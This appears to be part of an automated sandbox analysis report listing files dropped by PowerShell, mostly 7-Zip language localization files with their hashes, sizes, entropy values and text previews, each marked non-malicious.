                                                                                                                                                          SHA-512:E74E56210CB3C184499DE4E0D9E57E8EE9D7314B93FB1A97030A3397CC47B91EC74C704B25FC4BD16F4C7680240AE1D39D69CD9F024DD52C90EAE9CC6C53B6AE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8620
                                                                                                                                                          Entropy (8bit):5.041227149386308
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iw/kl7v3mUecLy8RIxXr1aYPDIbOPw7zinGjeQOsEyKtizzDQ:ixpvNeBUuXr03inG2tyKtiPDQ
                                                                                                                                                          MD5:A0A8A75560EFCF15801C96E6D71BECC3
                                                                                                                                                          SHA1:B3F7B92D2A13151A14B493108A50A8365C46F6A0
                                                                                                                                                          SHA-256:A72F01215EBA3BE3AF6659129DD20F7A42D74F1DA08658A9C8CE8E303C3E8F64
                                                                                                                                                          SHA-512:D730C0DC30A299B6BAB1B8CFAE64D8D4BDEA121E651641F578B0947BF5F67669F342CE20198B26FE7881EC99BAF290695BC460828198A997B4E59EC91396C217
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 3.12 : Alan .imek..; 4.53 : Hasan Osmanagi...; 9.07 : ..; 15.05 : 2015-06-15 : Stjepan Treger ..;..;..;..;..;..;..;..0..7-Zip..Croatian..Hrvatski..401..U redu..Odustani........&Da..&Ne..&Zatvori..Pomo.....Nastavi..440..Da za &Sve..Ne za Sv&e..&Stani..Ponovi..U pozadini..U prvom planu..&Pauza..Pauzirano..Poni.titi?..500..&Datoteke..&Ure.ivanje..&Izgled..Omiljene mape..&Alati..&Pomo...540..&Otvori..Ot&vori mapu..Otvori u &sustavu..Iz&gled..&Ure.ivanje..Prei&menuj..&Kopiraj u.....Premje&sti u.....O&bri.i..Podije&li datoteku.....Spo&ji datoteke.....Svojs&tva..Komentar..Izra.un kontrolnog zbroja..Uspore.ivanje..Stvo&ri mapu..Stvori &datoteku..&Izlaz..Poveznica..&Alternativni tokovi..600..Odaberi &sve..Poni.ti odabir..&Obrni odabir..Odaberi.....Poni.ti odabir.....Odabir po tipu..Poni.ti odabir tipa..700..&Velike ikone..&Male ikone..&Popis..&Detalji..730..Neso&rtirano..Sadr.aj mapa..&2 okna..Alatne &trake..&Korijen..&Nadmapa..Pro.&le mape.....O&svje.
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):108879
                                                                                                                                                          Entropy (8bit):5.649075357935098
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:a1WzOkbJiCwF/iGn1dgTrdA0RdpEtL1543ICJ:eSbY/iGkTtRdpEPu3ICJ
                                                                                                                                                          MD5:CA8A821FF5A6B848C5A170FF9A97BB39
                                                                                                                                                          SHA1:A98B91FA29848013CEF021EC8B3A29979CAC0C65
                                                                                                                                                          SHA-256:FDD99D667419612BF98200783E0CCF0F7C11913CA03CA162D72D43F6861E5478
                                                                                                                                                          SHA-512:E475A09E1F9F740B6C36C9B33B20F263896B869D8AC58848504DB29903A9597B84761B9C3918ADDC9C726D4429A0F496F44E3A8B0CCE9A3008D071A5D46BB5C6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9601
                                                                                                                                                          Entropy (8bit):5.256309162337387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iZEtt30B1cWELI7BD5QoMJu2dGiYU8dGfVFr6ksQA3+oV6YVSUJRPn:iaHOvxlQhJu2dLVUGfVFr6ksp3+oV63q
                                                                                                                                                          MD5:EEBEA9C4E71A5D2820F5E8972822800F
                                                                                                                                                          SHA1:E9F5E741995BF92266E5B6D6891896E5B9CC1F42
                                                                                                                                                          SHA-256:EF79E98FC911E0D0D16BD061A65F50F5E50CAA011699852E1608A2629B8BA37D
                                                                                                                                                          SHA-512:01B4BD586A1B2629B94DAB877510110E6FA1286EB9CDF7882539D42466609D830489BA450E7E7CC41958F463227F5376151F912591AA88C7866182374ED574A5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Jozsef Tamas Herczeg..; 9.16 : Nyilas MISY..; 15.00 : 2021-11-09 : Barnabas Kovacs..;..;..;..;..;..;..;..;..0..7-Zip..Hungarian..Magyar..401..OK..M.gsem........&Igen..&Nem..&Bez.r.s..S.g.....&Folytat.s..440..I&gen, mindre..N&em, mindre..Le.ll.t.s...jraind.t.s..&H.tt.rben..&El.t.rben..&Sz.net..Sz.net..Biztos, hogy megszak.tja a folyamatot?..500..&F.jl..S&zerkeszt.s..&N.zet..Ked&vencek..&Eszk.z.k..&S.g...540..M&egnyit.s..Megnyit.s &bel.l..Megnyit.s k.&v.l..&N.zet..S&zerkeszt.s...tn&evez.s..M.s&ol.s mapp.ba......t&helyez.s mapp.ba.....&T.rl.s..F.jl&darabol.s.....F.jl&egyes.t.s.....T&ulajdons.gok..&Megjegyz.s..Checksum sz.mol.sa..K.l.nbs.g..Mappa l.trehoz.sa..F.jl l.trehoz.sa..&Kil.p.s..Link..Alternat.v adatfolyam..600..Min&d kijel.l.se..Kijel.l.s megsz.ntet.se..Kijel.l.s &megford.t.sa..Kijel.l.s.....Megsz.ntet.s.....Kijel.l.s t.pus alapj.n..Megsz.ntet.s t.pus alapj.n..700.
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):14158
                                                                                                                                                          Entropy (8bit):4.347497505676546
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:igxIecm/mNxhlsms7CBFPwWbLkSMBvAoPz3qkZXDwC7o9F9f:iTeB4lE7Gw8KoqznlT2F9f
                                                                                                                                                          MD5:1362C3C286CFF992117D5466BBE284F6
                                                                                                                                                          SHA1:FAF50ECDB6DB6CD6BA9E0AE18E7FAD64511048C7
                                                                                                                                                          SHA-256:D8F60BF92541D20D01F6DDD56D49F25519303FD16E285E18080BE6815B74B8A8
                                                                                                                                                          SHA-512:1834FE901B1182B793872E2A822801966ABDF312873E15877E589B9C6A58D04E06A2C60B26D2209FE7048F7EA9BEFE0F6B39630EB4C5578A54735B6840677205
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Gevorg Papikyan..; 15.00 : Hrant Ohanyan : http://haysoft.org..;..;..;..;..;..;..;..;..;..0..7-Zip..Armenian...........401.......................&.....&....&.....................&............440..... ...... &......... ...... &.............................&...............&.........&............. ... ..............500..&......&..........&......&.............&..........&............540..&............ &.............. ...&.............&.............&.........&.............&..............&.............& ...........&....... ................&.................&.....................................&....... ..............
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8344
                                                                                                                                                          Entropy (8bit):4.872988134413637
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iQLoEmEjXCv1MYlMRsF40N+7EeN2ev9KJ3nhuCoLqY:i0oEmEjCv7lmsF67yev9KJ3nJouY
                                                                                                                                                          MD5:73B9F189F0C37D7CF37DF8DB89FB52AF
                                                                                                                                                          SHA1:060AD5B22F8DD408260B7210392C0A6F6271FBFF
                                                                                                                                                          SHA-256:18C4531E9FC00ED242F1C0526DBCD0A3D1ADA9BCFEE651AE950328AC872A216F
                                                                                                                                                          SHA-512:F8DCA8E9AECBAA7FD596535FB792314253814098C1089262ED36E78960FFEBE377C6436354228A9B4E17BB87FA6E1833110FD843C63BBCE3294262B623DF86E0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 20.00 : 2020-02-18 : Frans Leung..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Indonesian..Bahasa Indonesia..401..Oke..Batal........&Ya..&Tidak..&Tutup..Bantuan....&Lanjut..440..Ya untuk &semua..Tidak untuk s&emua..Henti..Mulai Ulang..Latar Bela&kang..Latar &Depan..&Jeda..Dijeda..Anda yakin ingin batal?..500..&Berkas..&Edit..Tam&pilan..&Kesukaan..Pera&latan..Ban&tuan..540..&Buka..Buka di &Dalam..Buka di L&uar..&Tampilkan..&Edit..&Nama Ulang..&Salin Ke.....P&indah Ke.....&Hapus..Be&lah Berkas.....Gabun&g Berkas.....P&roperti..K&omentar.....Hitung ceksum..Beda..Buat Direktori..Buat Berkas..&Keluar..Tautan..Alternati&f Aliran..600..Pi&lih Semua..Batal Pilih Semua..Pilih Sebal&iknya..Pilih.....Batal Pilih.....Pilih Berdasarkan Tipe..Batal Pilih Berdasarkan Tipe..700..Ikon &Besar..Ikon &Kecil..&Daftar..D&etail..730..Tidak Disortir..Tampil Datar..&2 Panel..Bilah Ala&t..Buka Akar Direktori..Naik Satu Tingkat..Riwayat Direktori.....&Segarkan..Segarkan Otomatis..750..Bilah Ala
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8746
                                                                                                                                                          Entropy (8bit):5.21465180545354
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:7vbGuJ7kBfcLpMPz89Pwkr5fXnNB3RQMFWdZtffvTqBmV4jLASZE33txMF:7vbrJ7k+Lpy8ukr5fXnNXxFaWBm4jLAu
                                                                                                                                                          MD5:F361950B7D1BB073EF48CA729B7ED5EA
                                                                                                                                                          SHA1:8C5D3FB8E09C9682C6256F05F82CA67C58F0FF2B
                                                                                                                                                          SHA-256:F4F9D6DFD36512F027452499B083AD0656DF6503CE03E4E4CC45B925F1F1D678
                                                                                                                                                          SHA-512:6163FB77D3155525A563AD907CDF48FA18A6CE019A073C7D9DC2438927217D0D8534ADA7FC444114F14AC216C89D12E83F5B582021BE693BAEC80BD69199909E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:;!@Lang2@!UTF-8!..; 19.02 : 2019-11-12 : Stef.n .rvar Sigmundsson..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Icelandic...slenska..401... lagi..H.tta vi.........&J...&Nei..&Loka..Hj.lp....&Halda .fram..440..&J. vi. .llu..&Nei vi. .llu..St..va..Endurr.sa..&Bakgrunnur..&Forgrunnur..&Gera hl.... hl.i..Ert .. viss um a. .. viljir h.tta vi.?..500..&Skr...&Breyta..&Sko.a..&Upp.hald..&Verkf.ri..&Hj.lp..540..&Opna..&Opna a. innanver.u..&Opna a. utanver.u..&Sko.a..&Breyta..&Endurnefna..&Afrita ......&F.ra ......&Ey.a..&Klj.fa skr......&Sameina skr.r.....&Eiginleikar..&Gera athugasemd.....Reikna samt.lu..Mismunur..Skapa m.ppu..Skapa skr...&H.tta..Tengill..&V.xlstraumar..600..&Velja allt..&Afvelja allt..&Umsn.a vali..Velja.....Afvelja.....Velja eftir tegund..Afvelja eftir tegund..700..&St.rar t.knmyndir..&Sm.ar t.knmyndir..&Listi..&Sm.atri.i..730...flokka...Flats.n..&2 spj.ld..&Verkf.rastikur..Opna r.tarm.ppu..Upp um eitt stig..M.ppusag
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9712
                                                                                                                                                          Entropy (8bit):4.869238753382525
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iqlpzc7zUwLkm5g6dLeUPezxs+GGWFP2oJhD0k8nv8C/PZmvmVxPdYjgl0h24oUf:imzo15g6cUPim+GGWVJhSvNP6mVxPdYP
                                                                                                                                                          MD5:87EFE148B443C6B50EAB945E27F9B39A
                                                                                                                                                          SHA1:D4A46F9A798C381A7415DE8B74B296F5632124C1
                                                                                                                                                          SHA-256:DD0A9A9CE33D25A9F6C461A6E43721E975B8B1E189C3D5B81F1DAD0FF12870BE
                                                                                                                                                          SHA-512:3F391E6C840EA267F500E7912E87E8696099AEE683A0A656A97033DEC8DE38F875C60DC21E9332A7E24CA3E2AE8C404FD936F915AD8C8A05EAB090C355916DD1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.07 : Leandro Spagnol..; : Vincenzo Reale (some corrections)..; 15.05 : 2015-06-17 : TJL73 : http://tjl73.altervista.org/..; 15.05 : 2017-02-01 : Massimo Castiglia..;..;..;..;..;..;..;..0..7-Zip..Italian..Italiano..401..OK..Annulla........&S...&No..&Chiudi..Aiuto....&Continua..440..S. per &tutti..No per t&utti..Stop..Riavvia..&In background..In p&rimo piano..&Pausa..In pausa..Sei sicuro di voler annullare?..500..&File..&Modifica..&Visualizza..&Preferiti..&Strumenti..&Aiuto..540..&Apri..Apri in &7-Zip File Manager..Apri con &un altro programma..&Visualizza..Modifica con l'&editor predefinito..Rino&mina..&Copia in.....&Sposta in.....&Elimina..&Suddividi il file.....&Unisci i files.....&Propriet...Comme&nto.....Calcola chec&ksum..Comparazione differenze (Diff)..Crea Cartella..Crea File..E&sci..Link..Streams &alternativi..600..Selezion&a tutto..&Deseleziona tutto..&Inverti selezione..Seleziona.....Deseleziona.....Seleziona per tipo..Deseleziona per tipo..7
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11839
                                                                                                                                                          Entropy (8bit):5.332273180318382
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i5bovSMlRAuVo6k8FUW7Plm6eAY/yCIQ4YftM40EZwGltXuWRzoaGN:i5svH80I8B1Y/C40yXRRzoaGN
                                                                                                                                                          MD5:470B0CA449E9F34BB34244A7EF39441B
                                                                                                                                                          SHA1:471C37014EFF0214CE757B6E88987FB9E2B31931
                                                                                                                                                          SHA-256:B0150C2B3D2AD9B37A7F47A24466AEA4A56CED728CAF12D02B407FD0080602AB
                                                                                                                                                          SHA-512:1E2D690E484449FA4859836F7AB880D512E98E5F996BF679ECB3A5C3CA8A3FC7E9FED4E6C2470FFF790CE22BB6AA407D951EC6C7CED571B5AC8E86CA873F3AFA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : : Komuro..; : : Mick..; : : 2chBBS-software..; : : Crus Mitsuaki..; 9.23 : 2011-06-22 : nabeshin..; 15.00 : 2015-04-30 : Stepanushkin Dmitry..; 19.00 : 2019-02-22 : Rukoto Luther..;..;..;..;..0..7-Zip..Japanese.......401..OK.................(&Y).....(&N).....(&C)...........(&C)..440.......(&A)........(&L)...................(&B)..........(&F)......(&P)......................?..500......(&F)....(&E)....(&V).......(&A).....(&T).....(&H)..540....(&O)..7-Zip ...(&I).........(&U)....(&V)....(&E).......(&M).....(&C).......(&M).......(&D)........(&S)...........(&B)..........(&R)......(&N)..............
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):18205
                                                                                                                                                          Entropy (8bit):3.5734503314271655
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ikzn3UlfDnVKqnB+C0aHgtyr6g5W0p5rUbVkmUmqIcR5mFuBUPNIazj:7sMW6gnAbVkmUm3
                                                                                                                                                          MD5:EB2AF4DC4C28275AE1876523944D708E
                                                                                                                                                          SHA1:BFB87569112A081A99ECD5BFDCC6F2AEAD07F67B
                                                                                                                                                          SHA-256:B78DEFEC49D07120B74C2172F3E07540314771B16729C6BBFC3A1902ECE2EDA0
                                                                                                                                                          SHA-512:E04680A6050FC6B3D0BF50A092F5FE2049BEDF705F479FB5C45852E4CC19D1B735B85166DA15EA67DBEB3AACF39DBE6C80EDA9D4C180805D87762468875AB49A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.23 : 2011-09-25 : Translated by Giorgi Maghlakelidze, original translation by Dimitri Gogelia, ..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Georgian...........401..OK..................&......&.....&......................&............440...... &................ ...&.............................&.........&.... ........&..........&..................... ..... .......... ........?..500..&.......&............&.......&.........&.............&...........540..&.............. &.............. ..&.......&..
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8102
                                                                                                                                                          Entropy (8bit):5.104223410120957
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iGKztgVKxXfv5NKHLm9ufAX7M5amaRi5WsU1Ok/VO1ri:iGStuYXfvBXQiuWslk/sBi
                                                                                                                                                          MD5:DFBA5C2185E113EEF167A5E21C32DF76
                                                                                                                                                          SHA1:E36703D7D1954E3F1729A0497674EC15C41A2F76
                                                                                                                                                          SHA-256:4D631602CE3D0C4D9162AF6BF56A90C8EEF75A24D556B729191B62F79ABA0681
                                                                                                                                                          SHA-512:3271B66114BD6F145693258C5E84A175ACB3DB865169734A9BEB5DE7F9AEFD06B4144650DC0E98FD47DD38AD3CABD26415640CDDC8AC611C23D14487E975FB70
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Atabek Murtazaev..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Karakalpak - Latin..Qaraqalpaqsha - Lat.n..401..OK..Biykar etiw........&Awa..&Yaq..&Jab.w..Ja'rdem....&Dawam etiw..440..&Barl.g'.na awa..Ba&rl.g'.na yaq..Toqtat.w..Qaytadan baslaw..&Artq. fong'a..Ald.ng'. &fong'a..&Pauza..Pauza q.l.ng'an..An.q biykar etiwdi qa'leysizbe?..500..&Fayl..&Du'zetiw..&Ko'rinis..&Sayland.lar..A's&baplar..&Ja'rdem..540..&Ash.w..&.shinde ash.w..&S.rt.nda ash.w..&Ko'riw..&Du'zetiw..At.n o'&zgertiw..Bul jerge &nusqas.n al.w.....Bul jerge ko'shiriw.....O'shiriw..&Fayld. bo'liw.....Fayllard. &biriktiriw.....Sazlawla&r..Kom&mentariy.....Qadag'alaw summas...Diff..Papka jarat.w..Fayl jarat.w..Sh&.g'.w..600..Barl.g'.n &saylaw..Saylawd. al.p taslaw..Saylawd. &teris awdar.w..Saylaw.....Saylawd. al.p taslaw.....Tu'ri boy.nsha saylaw..Tu'ri boy.nsha saylawd. al.p taslaw..700..U'&lken ikonalar..Kishi &ikonalar..&Dizim..&Keste..730..Ta'rtipsiz..Te
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8592
                                                                                                                                                          Entropy (8bit):5.231781574254223
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iFKQ2IdVUQs/gSSmlPgUulpuDUed3JhFyglCxCxqJo+Msp04ndCVv:iY7IrsgSSmlPgXpUUed3Jh8FCxaB/dCF
                                                                                                                                                          MD5:C6AC7AAD8BCE83AC69F197DB9D4529F8
                                                                                                                                                          SHA1:5FA31CCFA23B753CEE7AEE7EE65915AAA94F9B01
                                                                                                                                                          SHA-256:B8A7A5182DFDACC9BACCB412E161C60864D3B5D30038935122C736AE4F4EBC22
                                                                                                                                                          SHA-512:A643E38A5801A50FD318FEFEB0245B8935C818737B860839C15FA09B0CC0E9EF55EB455E3CEAF8B2263AE23B5BEFD1E6013BA63C4ABD1B89627905498FF026BE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 15.00 : 2018-02-27 : Belkacem Mohammed..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Kabyle..Taqbaylit..401..IH..Sefsex........&Ih..&Uhu..&Mdel..Tallelt....&Kemmel..440..Ih i &Me..a..Uhu i M&e..a..Se.bes..Ales tanekra..&Agilal..&A.awas Amezwaru..&R.u..I.bes..Teb.i. ad tsefsxe.?..500..A&faylu..&.reg..&Sken..I&nurifen..&Ifecka..&Tallelt..540..&Ldi..Ldi deg &ugensu..Ldi di B&erra..&Sken..&..eg..Snif&el Isem..&N.el .er.....&Senkez .er.....&Kkes..&B.u Afaylu.....Sdu&kkel ifuyla.....A&ylan..Awenn&it.....Timernit n Usenqed..Ice..iq..Snulfu-d Akaram..Snulfu-d Afaylu..F&fe...Ase.wen..&Alternate Streams..600..Fren &Me..a..Kkes Afran i Me..a..&Tti Afran..Fren.....Kkes Afran.....Fren s Tawsit..Kkes Afran s Tawsit..700..Tig&nitin Timeqranin..T&ignitin Time.yanin..&Tabdart..&Talqayt..730..Ur Yettwafren ara..Askan Imlebbe...&2 Igalisen..&Ifeggagen n Ifecka..Ldi Akaram Agejdan..Yiwen Uswir d Asawen..Amazray n Ikaramen.....&Smiren..Asmir
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10732
                                                                                                                                                          Entropy (8bit):4.659322147322825
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iwHw0jjl8sq/UDEAY40JI0lkMPK+K4ppfdMMda764a:iwHw0jjiRUD8kMPJqMdj4a
                                                                                                                                                          MD5:F4C46B450A580AD5ABF0B638DCDCC6FB
                                                                                                                                                          SHA1:750DFDDDDADEE9CFE0E8F651F1C6CC38CF1FCD78
                                                                                                                                                          SHA-256:F2E6E55C102485E232DAAD00F68D8905F7A54F8AE2128DB6AFE25231C17ACD69
                                                                                                                                                          SHA-512:24B6DC7B491302B905C1E20E67DDAB16AF9420820B6C83406618E017FA84D952661087E2EA577831441E8A3C82EF697DE713597E33626AED787F3485DD9B1F7D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : Arslan Beisenov, Arman Beisenov..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Kazakh...........401............................&....&.....&..................&............440........ &.......... &................... .... ......&.......&....... ..........&............................ ....... ..... ..?..500..&......&.......&.........&...........&.......&..........540..&........... &............. ............&............ ......&...........&............&........... .................... .............................&.................. ........Diff..&..... ........... .............600....... ...................... ....
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9900
                                                                                                                                                          Entropy (8bit):5.617543855498878
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i36rCE/KKcFaeVLs7sdGBbeO9onv40if8Knv3E3q9FGdUBUe:i6CE/KKcQSLsJbeOqti0KvoAGdqUe
                                                                                                                                                          MD5:55E8685AC21571F0B5F11A4D5FA088F9
                                                                                                                                                          SHA1:285D09B7A8ADCAB4E5D72928487C711B8F48B8FB
                                                                                                                                                          SHA-256:58A2DD10438C1199653C1BCD88C520DDB437FA8E01BCF311130ADA0A626151C7
                                                                                                                                                          SHA-512:BD95E5F82E17494404E7319F5CDC1B4BDD868B2AE73BE1CF407F9F1E54B360BF75A36993A60A14D29E4AF3EC15E0538F23E1F22DCA1153BD01FC0BA964390337
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : ZannyLim (...)..; : bzImage..; 4.52 : Hyeong il Kim (kurt Sawyer)..; 9.07 : Dong-yoon Han (...)..; 15.12 : Winterscenery (Ji-yong BAE)..; 16.04 : Add translation and Modify by Winterscenery (Ji-yong BAE)..;..;..;..;..;..0..7-Zip..Korean.......401.................(&Y).....(&N)....(&C)...........(&C)..440.... .(&A).... ...(&L)........ ...... ...(&B).... ...(&F)......(&P)...... ...... ........?..500....(&F)....(&E)....(&V)......(&A)....(&T).....(&H)..540....(&O).... ..(&I).... ..(&U).... ..(&V)....(&E)... ..(&M)....(&C).......(&M).......(&D).... ...(&S)....... ...(&B).......(&R)....(&N)........ ...... ...... ....... ........(&X)........ ... ...(&A
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12360
                                                                                                                                                          Entropy (8bit):4.546190162778464
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:igHCpEmyIRe0g/OQMEuDP9Y799boVTiUaml4hSf7UAlA+cA90s5bKlcRBfwCiIEW:ivjQMTDShMTiUaTSfwA90sglMRMj2z/
                                                                                                                                                          MD5:C90D029172A8533946EF7419BF383305
                                                                                                                                                          SHA1:7B3D96899F5935E559626D215517315C04207627
                                                                                                                                                          SHA-256:19AF39960142B8599153A09EF4F03F944FC00999BEB9FE2399F5F8B236716EEF
                                                                                                                                                          SHA-512:B0A711161CE233E5B9231C21ABFD721BCA6A85567DEBC6CC9C033C68D0A6E1292F369DBF1EA52B4088658D13263C245EA37752E87ABD8B2AA878B5270EF0B1BE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Ara Bakhtiar..; 4.66 : Ara Qadir : http://www.chawg.org..;..;..;..;..;..;..;..;..;..0..7-Zip..Kurdish - Sorani.........401.............................&......&.......&...................&..............440...... .. &............ .. ..&..............................&............&..........&......................... .. ................500..&......&..........&........&...........&............&.........540..&................ ..&... ............. .. &........&.......&..........&..........&............ .......&......... .......&.........&........ ..........&...... ....... .............&...................&............
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12614
                                                                                                                                                          Entropy (8bit):4.649736068304655
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ikVDGPB8R8wedC+GwW2womKx4rXNMQOpR2avWPYx3jqSxv:78Z8+7CS8uiMkARuSN
                                                                                                                                                          MD5:7D0420EE265C9122DC11EF964871E179
                                                                                                                                                          SHA1:4B84B209E5A637869E501D54FF0B535BD3924851
                                                                                                                                                          SHA-256:4EF68FBD8AB002BBF4CD6D1C9FD6D87A5FDE048AFD2EF162B727259EB97D70D2
                                                                                                                                                          SHA-512:0DDCD7871E61B76ACF3FA0224519ED8E29C33234C300097F69E799951F8F9E87943A4F755F1362856F0C2A3804C399E466CF08CF0E189EC7BCDF744E07C61635
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.20 : Kalil uulu Bolot..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Kyrgyz............401..OK...............&......&.....&.................&.........440...... &............ .&...... .................. .........&.......&....... ........&....................... ... ... .......... ........... ..... ......?..500..&......&.......&......&............&.......&........540..&.........&... ...........&... .............&.................& ..........&.... ............&.... ..... ............&..........&... ................&........ .............&...........&.................. ..........Diff..&...... ............&. ......
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7882
                                                                                                                                                          Entropy (8bit):5.013331648035662
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iIxLxXfim7pf7nJePcyzqBJv3/gxqwP95y:iIxLxXTFDnxoxqwP94
                                                                                                                                                          MD5:372BC4A26B676C48CF8FEFAB3711B91D
                                                                                                                                                          SHA1:39DA7AC5A483BD675657C24F875C2CEE93204A1E
                                                                                                                                                          SHA-256:431CAE1BB77633FDF3CE339E97BC5D5D885779DECC01ED03583E381F097A2487
                                                                                                                                                          SHA-512:0BF4DED969BC2AF21B806FEA241B7F0A312D8D4D9C81B14293E352E09DC31B3B876C77C155B6C9769D89B169D8DE65C4F52B649ACBF90AF14E75CCD6BB8157DF
                                                                                                                                                          Malicious:false
